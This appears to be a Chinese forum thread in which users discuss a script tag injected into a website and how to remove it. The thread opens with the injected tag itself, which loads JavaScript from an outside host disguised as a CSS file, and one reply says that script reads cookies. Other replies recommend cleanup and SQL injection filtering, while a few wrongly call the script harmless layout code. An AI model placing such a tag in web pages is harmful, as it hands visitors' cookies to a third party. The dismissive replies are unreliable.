<script language="javascript" src="http://css.qpoe.com/css.js?mo=8&esa=21"></script>

一般可以用如下方法手工清除恶意代码，我的就是这样子做的。

这个可以用DM2004里打开你的站点，然后在查找替换里把上面的源代码中JS代码的替换成空格。。。

你在去掉后得改下你的站点，得防SQL注入，写个过滤函数就可以。。

注意，数据库中的要手工去删才行

如果是显示在网页上就可以不用去管他
也不知道那个白痴写的代码

是出现在什么网页上，你要说清楚。
你把src="http://css.qpoe.com/css.js?mo=8&esa=21直接输出到浏览器的地址栏，可以看到该文件的源代码，你可以发现它在读取cookie，cookie有可能包含了一些敏感信息，因此不能排除它是恶意代码的可能。

我的网站前两天就是被人家使用sql注入的方式注入了这种代码，让我的网页变的乱七八糟，不知道你的情况是什么样的！！

调用了一段JS, 从字面上看应该是布局的JS。 JS一般是在客户端运行的 可且可以很好的屏蔽。应该没多大问题。CSS是管理布局的，顶多就是换换页面

是不是局域网？ 可能受到arp攻击了